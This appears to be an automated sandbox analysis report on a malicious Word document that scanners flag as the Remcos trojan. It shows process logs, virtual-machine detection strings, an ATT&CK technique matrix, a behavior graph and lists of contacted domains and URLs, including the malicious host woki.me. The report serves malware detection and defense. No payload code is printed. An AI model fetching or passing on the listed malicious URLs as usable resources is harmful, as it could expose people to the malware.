Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.9.drBinary or memory string: VMware20,1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D7963D5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 5e b8 7f fe b2 05-05 05 26 a7 ed b4 36 80
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00VMware Virq'Z
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virq'Z
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Bootkit		Boot or Logon Initialization Scripts1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Bootkit		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
System Information Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1616494 Sample: NCR2025-000455.docx.doc Startdate: 16/02/2025 Architecture: WINDOWS Score: 64 14 woki.me 2->14 16 res-stls-prod.edgesuite.net.globalredir.akadns88.net 2->16 18 2 other IPs or domains 2->18 26 Suricata IDS alerts for network traffic 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 Contains an external reference to another file 2->30 32 Document exploit detected (process start blacklist hit) 2->32 7 WINWORD.EXE 501 66 2->7         started        signatures3 process4 dnsIp5 20 67.217.247.193, 53977, 53979, 80 SRS-6-Z-7381US United States 7->20 22 woki.me 142.132.211.198, 443, 53971, 53973 UNIVERSITYOFWINNIPEG-ASNCA Canada 7->22 24 a726.dscd.akamai.net 2.22.242.9, 443, 53985 AKAMAI-ASN1EU European Union 7->24 10 WerFault.exe 1 13 7->10         started        12 WerFault.exe 2 7->12         started        process6

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
NCR2025-000455.docx.doc41%VirustotalBrowse
NCR2025-000455.docx.doc35%ReversingLabsDocument-Word.Trojan.Remcos

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://entitlement.diagnostics.office.com17Dh00%Avira URL Cloudsafe
https://d.docs.live.netz0%Avira URL Cloudsafe
https://api.aadrm.come0%Avira URL Cloudsafe
https://woki.me/DQaKj/Desktop0%Avira URL Cloudsafe
https://woki.me/QaKj0%Avira URL Cloudsafe
https://substrate.office.com_TU0%Avira URL Cloudsafe
https://api.aadrm.comR0%Avira URL Cloudsafe
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonPvb0%Avira URL Cloudsafe
https://cortana.aib0%Avira URL Cloudsafe
https://webshell.suite.office.comTgh0%Avira URL Cloudsafe
https://augloop.office.comared0%Avira URL Cloudsafe
https://cortana.aitlf0%Avira URL Cloudsafe
https://officepyservice.office.net/&0%Avira URL Cloudsafe
https://cr.office.comv0%Avira URL Cloudsafe
https://wus2.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1Uah0%Avira URL Cloudsafe
https://woki.me/DQaKj/0%Avira URL Cloudsafe
https://notification.m365.svc.cloud.microsoft/api/v1/registertfreeformspeech0%Avira URL Cloudsafe
https://incidents.diagnostics.office.comom0%Avira URL Cloudsafe
https://woki.me/DQaKj0%Avira URL Cloudsafe
https://dataservice.prot0%Avira URL Cloudsafe
https://cr.office.comF0%Avira URL Cloudsafe
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeeche0%Avira URL Cloudsafe
https://outlook.office.comS.DLL0%Avira URL Cloudsafe
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectorybpQ0%Avira URL Cloudsafe
https://realtimesync.onenote.com/realtimechannel/v1.0/signalr/hubv1.0/signalr/hubE0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
woki.me
142.132.211.198
truefalse
    		high
    a726.dscd.akamai.net
    		2.22.242.9
    		truefalse
      		high
      s-0005.dual-s-msedge.net
      		52.123.129.14
      		truefalse
        		high
        198.187.3.20.in-addr.arpa
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://woki.me/DQaKjtrue
          • Avira URL Cloud: safe
          		unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://substrate.office.com/Notes-Internal.ReadWritexWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
            		high
            https://analysis.windows.net/powerbi/apit~WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppicTWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechseWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://autodiscover-s.outlook.com/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://cdn.entity.WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://prod.support.office.com/InAppHelps=3WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://prod.support.office.com/InAppHelpev=3JWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://login.windows.net/common/oauth2/authorizeredirWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://substrate.office.com/imageB2/v1.0/me/image/resize%28width%3D384%2Cheight%3D384%2CallowResizeWINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://prod.support.office.com/InAppHelp1001oWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://prod.support.office.com/InAppHelp1001WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://forms.office.com/Pages/DesignPageV2.aspx?lang=WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.aadrm.com/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://entitlement.diagnostics.office.com17Dh0WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://woki.me/DQaKj/DesktopWINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://substrate.office.com/M365.AccesspxspxWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.aadrm.comeWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.yammer.comWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://d.docs.live.netzWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://woki.me/QaKjWINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.microsoftstream.com/api/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://substrate.office.com_TUWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://webshell.suite.office.comTghWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://login.windows.net/common/oauth2/authorizethmeWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordeechquCWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.powerbi.com/v1.0/myorg/importsEWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.microsoftstream.com/api/heWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://res.getmicrosoftkey.com/api/redemptioneventsWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.aadrm.comRWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cortana.aibWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilevrWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonPvbWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://augloop.office.comaredWINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeduVWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cortana.aitlfWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cr.office.comvWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
